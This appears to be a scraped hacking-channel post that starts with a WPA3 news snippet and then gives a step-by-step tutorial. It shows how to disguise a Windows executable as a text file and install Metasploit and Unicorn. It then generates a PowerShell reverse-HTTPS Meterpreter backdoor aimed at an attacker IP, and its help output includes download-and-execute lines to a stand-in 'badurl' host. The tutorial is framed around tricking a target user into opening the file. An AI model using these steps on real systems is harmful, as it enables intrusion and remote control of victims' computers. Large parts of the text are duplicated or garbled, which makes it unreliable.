WPA3 Standard Officially Launches With New Wi-Fi Security Features
The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks.
WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended
➖ @free_hacking_tutorial▪️
The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks.
WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended
➖ @free_hacking_tutorial▪️
Hey members I would like to take suggestion about this channel so please take your fraction seconds of your time and give us comments about this channel @anything_you_need_bot
And if you like it the way it is give it like 👍
And if you like it the way it is give it like 👍
Hackers are always seeking zero-day exploits that can successfully bypass Windows 10's security features. There has been extensive research into creating undetectable malware and entire GitHub projects dedicated to automating the creation of undetectable payloads such as WinPaylods, Veil v3, and TheFatRat.
With a bit of social engineering, tricking a target user into opening a malicious file can be as simple as injecting a bit of Unicode into the file name. For example, the below GIF shows a Windows executable (EXE) disguised to appear as a normal text file (TXT) — even with "Hide extensions for known file types" disabled in the File Explorer Options.
Make no mistake, the file on the right is an executable and, more importantly, recognized by the Windows operating system as an executable. When the fake text file is clicked, it opens a new document using Notepad, the default text editor in Windows 10. After opening Notepad, it silently executes an embedded PowerShell payload (made with Unicorn) which creates a backdoor to the now compromised Windows computer.
Unicorn, created by TrustedSec, is a simple tool designed to assist penetration tester's with PowerShell downgrade attacks and injecting sophisticated shellcode payloads straight into memory. The techniques utilized by Unicorn are based on the work of Matthew Graeber and TrustedSec founder David Kennedy.
@free_hacking_tutorial
With a bit of social engineering, tricking a target user into opening a malicious file can be as simple as injecting a bit of Unicode into the file name. For example, the below GIF shows a Windows executable (EXE) disguised to appear as a normal text file (TXT) — even with "Hide extensions for known file types" disabled in the File Explorer Options.
Make no mistake, the file on the right is an executable and, more importantly, recognized by the Windows operating system as an executable. When the fake text file is clicked, it opens a new document using Notepad, the default text editor in Windows 10. After opening Notepad, it silently executes an embedded PowerShell payload (made with Unicorn) which creates a backdoor to the now compromised Windows computer.
Unicorn, created by TrustedSec, is a simple tool designed to assist penetration tester's with PowerShell downgrade attacks and injecting sophisticated shellcode payloads straight into memory. The techniques utilized by Unicorn are based on the work of Matthew Graeber and TrustedSec founder David Kennedy.
@free_hacking_tutorial
Step 1
Install Metasploit Framework
Metasploit is a dependency of Unicorn. Before installing Unicorn, I'll quickly guide readers through a Metasploit installation to ensure it's entirely up to date using the GitHub repository.
Kali does an excellent job of maintaining stable versions of Metasploit, but I'll show how to install the absolute latest version. First, remove any older versions of Metasploit that may be pre-installed in Kali.
apt-get remove metasploit-framework
Install Metasploit Framework
Metasploit is a dependency of Unicorn. Before installing Unicorn, I'll quickly guide readers through a Metasploit installation to ensure it's entirely up to date using the GitHub repository.
Kali does an excellent job of maintaining stable versions of Metasploit, but I'll show how to install the absolute latest version. First, remove any older versions of Metasploit that may be pre-installed in Kali.
apt-get remove metasploit-framework
Then, use cURL to download the Metasploit installer.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Upgrade the newly created msfinstall file permissions to ensure it will execute in Kali.
chmod 755 msfinstall
Then, execute the installer script with ./msfinstall.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Upgrade the newly created msfinstall file permissions to ensure it will execute in Kali.
chmod 755 msfinstall
Then, execute the installer script with ./msfinstall.
./msfinstall
Adding metasploit-framework to your repository list..OK
Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded.
Need to get 161 MB of archives.
After this operation, 377 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Fetched 65.7 MB in 11min 39s (93.9 kB/s)
Selecting previously unselected package metasploit-framework.
(Reading database ... 145965 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode
Run msfconsole to get started
W: --force-yes is deprecated, use one of the options starting with --allow instead.
Adding metasploit-framework to your repository list..OK
Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded.
Need to get 161 MB of archives.
After this operation, 377 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Fetched 65.7 MB in 11min 39s (93.9 kB/s)
Selecting previously unselected package metasploit-framework.
(Reading database ... 145965 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode
Run msfconsole to get started
W: --force-yes is deprecated, use one of the options starting with --allow instead.
Metasploit
Directory Tree
When the installer is completed, there will be a new metasploit-framework/ directory in the /opt directory.
@free_hacking_tutorial
@free_hacking_tutorial
Step 2
Install Unicorn
With the Metasploit installation taken care of, the Unicorn GitHub repository can be cloned using git clone github.com/trustedsec/unicorn.
@hackersworldunite
Install Unicorn
With the Metasploit installation taken care of, the Unicorn GitHub repository can be cloned using git clone github.com/trustedsec/unicorn.
@hackersworldunite
GitHub
GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into…
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique...
git clone https://github.com/trustedsec/unicorn
Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done
Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done
GitHub
GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into…
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique...
To view the available Unicorn options and comprehensive descriptions of each attack, use the ./unicorn.py --help argument.
@free_hacking_tutorial
@free_hacking_tutorial
/unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port gtoptional hta or macro, crtlt
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py gtcobalt_strike_file.cslt cs macro
Macro Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py gtcobalt_strike_file.cslt cs hta
HTA Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py gtpath_to_payload/exe_encodelt crt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt macro 500
Cobalt Strike Example: python unicorn.py gtcobalt_strike_file.cslt cs (export CS in C# format)
Custom Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port gtoptional hta or macro, crtlt
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py gtcobalt_strike_file.cslt cs macro
Macro Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py gtcobalt_strike_file.cslt cs hta
HTA Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py gtpath_to_payload/exe_encodelt crt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt macro 500
Cobalt Strike Example: python unicorn.py gtcobalt_strike_file.cslt cs (export CS in C# format)
Custom Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
TrustedSec
Your Trusted Cybersecurity Partner | TrustedSec
Experience fundamentally different cybersecurity for business success, providing end-to-end consulting from penetration testing to design and hardening.
Step 3
Generate the Payload
To create a payload with Unicorn, use the below command.
Generate the Payload
To create a payload with Unicorn, use the below command.
./unicorn.py windows/meterpreter/reverse_https gtATTACKER-IP-ADDRESSlt gtPORTlt
Unicorn will use the Metasploit reverse_https module to connect to the attackers IP address using the specified port.
@free_hacking_tutorial
@free_hacking_tutorial
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
,/
//
,//
___ /| |//
|\_-___,-\_____--/_)' ) \
\ -_ / __ \(
\__________/(,--__ \_________. | ./ |
| \ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ (
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( ; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Nahom
@free_hacking_tutorial
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWER
,/
//
,//
___ /| |//
__/\_ --(/|___/-/
\|\_-\___ __-_- /-/ \.|\_-___,-\_____--/_)' ) \
\ -_ / __ \(
( __\|\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ /_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \--, _/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ ---_ /|\__________/(,--__ \_________. | ./ |
| \ \
---_\--, \ \_,./ |
| \ \_ \ /---_______-\ \\ /
\ \.___,| / \ \\ \\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ (
_' \ |
\. \ \. \ / | |\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( ; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Nahom
@free_hacking_tutorial
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWER
SHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.
@free_hacking_tutorial
@free_hacking_tutorial
The other file created by Unicorn is unicorn.rc, a resource file which will automate the msfconsole setup and configuration.